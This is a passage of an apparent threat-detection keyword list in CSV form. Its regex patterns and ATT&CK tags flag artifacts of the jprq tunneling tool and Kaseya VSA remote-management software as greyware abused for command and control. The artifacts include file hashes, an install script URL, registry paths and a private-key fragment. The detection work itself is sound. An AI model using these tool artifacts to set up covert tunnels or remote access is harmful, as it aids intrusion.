protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*1a1b2883ad2c55fe3a1d4544bc1401e92a0b98148d85f6e5fdaa54154ba5a2e8*",".{0,1000}1a1b2883ad2c55fe3a1d4544bc1401e92a0b98148d85f6e5fdaa54154ba5a2e8.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*1b41fb4be93b92548f9e5419fae45b76592a5b6ab0c5d42930f6824686225f3c*",".{0,1000}1b41fb4be93b92548f9e5419fae45b76592a5b6ab0c5d42930f6824686225f3c.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*1e68cb8928288f31a3f1b7fc867f79f56912c289f93a3dffd962fea895fb8f12*",".{0,1000}1e68cb8928288f31a3f1b7fc867f79f56912c289f93a3dffd962fea895fb8f12.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*2ed85cb524b3d21a29ae39ad50874d1cf8546d2dfedb931b9fcf76cc4e0e7cf0*",".{0,1000}2ed85cb524b3d21a29ae39ad50874d1cf8546d2dfedb931b9fcf76cc4e0e7cf0.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*31fb5154969f2729699b04a7ea6202ad59dabb1e36eb5f8f9b1159e3775e267f*",".{0,1000}31fb5154969f2729699b04a7ea6202ad59dabb1e36eb5f8f9b1159e3775e267f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*3984e827963ca5f0925404d02526b0c12956f4d04a64853226e54a2f9333bf04*",".{0,1000}3984e827963ca5f0925404d02526b0c12956f4d04a64853226e54a2f9333bf04.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*3eaa14907c96c3a261cce8f5379fa8ecab9911cc2f3711b4b08b8d382a7ee772*",".{0,1000}3eaa14907c96c3a261cce8f5379fa8ecab9911cc2f3711b4b08b8d382a7ee772.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*4796c4183abeeb96966e3eb03493345cd7e148688e9fe5613c5bda26692063b7*",".{0,1000}4796c4183abeeb96966e3eb03493345cd7e148688e9fe5613c5bda26692063b7.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*51e63f127dfc4804bec4dc1e5bc19034d50953c246417203b95ddba89bbfe082*",".{0,1000}51e63f127dfc4804bec4dc1e5bc19034d50953c246417203b95ddba89bbfe082.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*5a19b174e1c46c7f3591c79dc5264d43bb68c9537393a8cecd6269567b821778",".{0,1000}5a19b174e1c46c7f3591c79dc5264d43bb68c9537393a8cecd6269567b821778","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*6c3dc714596f1b78c4921bb8b25f073bdc95a8bca363f070b4e5e34c4b2a34ac*",".{0,1000}6c3dc714596f1b78c4921bb8b25f073bdc95a8bca363f070b4e5e34c4b2a34ac.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*73314bd200038dc11b2a008f9d90164565d15744724a5ea9a0750823a8d0d73b*",".{0,1000}73314bd200038dc11b2a008f9d90164565d15744724a5ea9a0750823a8d0d73b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*7d367e348e24f197222c639324ce56bea8d2b2cd39c88f8df390e1b5af90942b*",".{0,1000}7d367e348e24f197222c639324ce56bea8d2b2cd39c88f8df390e1b5af90942b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*8e63f8fb62f2dd2f310bf619ab65c97d5dd1835d97cced5eb8cebddd293d2d06*",".{0,1000}8e63f8fb62f2dd2f310bf619ab65c97d5dd1835d97cced5eb8cebddd293d2d06.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*905bda9ca65d9b7f6151de763a7c3ce2dd15a69b8410d89b04dd5bb68d17dece*",".{0,1000}905bda9ca65d9b7f6151de763a7c3ce2dd15a69b8410d89b04dd5bb68d17dece.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*9e3476f783250e1fd848c17fb9d5a6c32e151ff1382bcde09a0ac903dea8a16f*",".{0,1000}9e3476f783250e1fd848c17fb9d5a6c32e151ff1382bcde09a0ac903dea8a16f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*a56d443310f333dae0b4900ca18d0f903f5076369ae4053c035d9c39d76f59b2*",".{0,1000}a56d443310f333dae0b4900ca18d0f903f5076369ae4053c035d9c39d76f59b2.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*acd19845a6484eee65db6f925b1d0244300831d4d5a37d147cc61e7e8c56775b*",".{0,1000}acd19845a6484eee65db6f925b1d0244300831d4d5a37d147cc61e7e8c56775b.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*azimjohn/jprq*",".{0,1000}azimjohn\/jprq.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*b44c1910df6b24847b75712e9f183d5fd9119e2e4dfdc15eeecb5e7159e4530a*",".{0,1000}b44c1910df6b24847b75712e9f183d5fd9119e2e4dfdc15eeecb5e7159e4530a.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*bdca5844eac154b94bbdd1b51e68f7d4e45a560fa13c7ce0a227646b0091982a*",".{0,1000}bdca5844eac154b94bbdd1b51e68f7d4e45a560fa13c7ce0a227646b0091982a.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*bf356e9c87e06eddfe9c5c476742bbc9cf26405631296f03c8f57f91afbb5247*",".{0,1000}bf356e9c87e06eddfe9c5c476742bbc9cf26405631296f03c8f57f91afbb5247.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*de10b700cffb64956f55e044a9ce830d9b775af10560b54f21b2fc125c801618*",".{0,1000}de10b700cffb64956f55e044a9ce830d9b775af10560b54f21b2fc125c801618.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*e749b296484dbb4329fc0e4dff5fe963ddc7ff3450042ce267fdd1b5abcd2fdb*",".{0,1000}e749b296484dbb4329fc0e4dff5fe963ddc7ff3450042ce267fdd1b5abcd2fdb.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*f11f0d5b7f14d4751f40b9c2c92928dfdbe0d055981e140ba0a5d75ecfe72e10*",".{0,1000}f11f0d5b7f14d4751f40b9c2c92928dfdbe0d055981e140ba0a5d75ecfe72e10.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*fc621d5952a8fb61bfc73e197db64d87f35d1c12550b7bf6160bc78f6d61e44f*",".{0,1000}fc621d5952a8fb61bfc73e197db64d87f35d1c12550b7bf6160bc78f6d61e44f.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#filehash","#filehash","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*github.com*/jprq/releases/download/*",".{0,1000}github\.com.{0,1000}\/jprq\/releases\/download\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*https://aur.archlinux.org/jprq.git*",".{0,1000}https\:\/\/aur\.archlinux\.org\/jprq\.git.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*https://jprq.io/auth*",".{0,1000}https\:\/\/jprq\.io\/auth.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*https://jprq.io/install.sh*",".{0,1000}https\:\/\/jprq\.io\/install\.sh.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","1","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*JPRQ - The Tunneling Service*",".{0,1000}JPRQ\s\-\sThe\sTunneling\sService.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*jprq is successfully installed*",".{0,1000}jprq\sis\ssuccessfully\sinstalled.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*JPRQ_DOMAIN=*",".{0,1000}JPRQ_DOMAIN\=.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","N/A","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "*MIIEpQIBAAKCAQEAuIGT1C2uPwb62IT/5IJdFioVAB/r3Pa885n4z+xEtGIm6XmD*",".{0,1000}MIIEpQIBAAKCAQEAuIGT1C2uPwb62IT\/5IJdFioVAB\/r3Pa885n4z\+xEtGIm6XmD.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. 
Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","N/A","ssh privkey","10","10","937","138","2024-08-07T21:45:16Z","2020-04-18T10:12:42Z" "* pcmontask.exe*",".{0,1000}\spcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* RemoteDesktop.exe*",".{0,1000}\sRemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* VSAX_x64.msi*",".{0,1000}\sVSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.vsax.net*",".{0,1000}\.vsax\.net.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/pcmontask.exe*",".{0,1000}\/pcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemoteDesktop.exe*",".{0,1000}\/RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/VSAX_x64.msi*",".{0,1000}\/VSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/vsxrc-clip.exe*",".{0,1000}\/vsxrc\-clip\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\freerdp*",".{0,1000}\\AppData\\Roaming\\freerdp.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT 
management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\VSA X*",".{0,1000}\\AppData\\Roaming\\VSA\sX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\VSAX*",".{0,1000}\\CurrentControlSet\\Services\\VSAX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Kaseya\PC Monitor\*",".{0,1000}\\Kaseya\\PC\sMonitor\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\PC Monitor\Addons*",".{0,1000}\\PC\sMonitor\\Addons.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT 
departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\pcmontask.exe*",".{0,1000}\\pcmontask\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcmupdate.exe*",".{0,1000}\\pcmupdate\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RemoteDesktop.exe*",".{0,1000}\\RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Services\EventLog\Application\VSA X*",".{0,1000}\\Services\\EventLog\\Application\\VSA\sX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Services\EventLog\Application\VSAX*",".{0,1000}\\Services\\EventLog\\Application\\VSAX.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Kaseya\*",".{0,1000}\\SOFTWARE\\Kaseya\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\TaskCache\Tree\VSA XServiceCheck*",".{0,1000}\\TaskCache\\Tree\\VSA\sXServiceCheck.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\VSA X Manager.lnk*",".{0,1000}\\VSA\sX\sManager\.lnk.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\VSA X Remote Control.lnk*",".{0,1000}\\VSA\sX\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\VSA X Remote Control\*",".{0,1000}\\VSA\sX\sRemote\sControl\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\VSA X\watchdog.bat*",".{0,1000}\\VSA\sX\\watchdog\.bat.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\VSA XServiceCheck*",".{0,1000}\\VSA\sXServiceCheck.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\VSAX\working*",".{0,1000}\\VSAX\\working.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\VSAX_x64.msi*",".{0,1000}\\VSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\vsxrc-clip.exe*",".{0,1000}\\vsxrc\-clip\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*KASEYA HOLDINGS INC.*",".{0,1000}KASEYA\sHOLDINGS\sINC\..{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*managedsupport.kaseya.net*",".{0,1000}managedsupport\.kaseya\.net.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorCfg.dll*",".{0,1000}PCMonitorCfg\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorClient.dll*",".{0,1000}PCMonitorClient\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 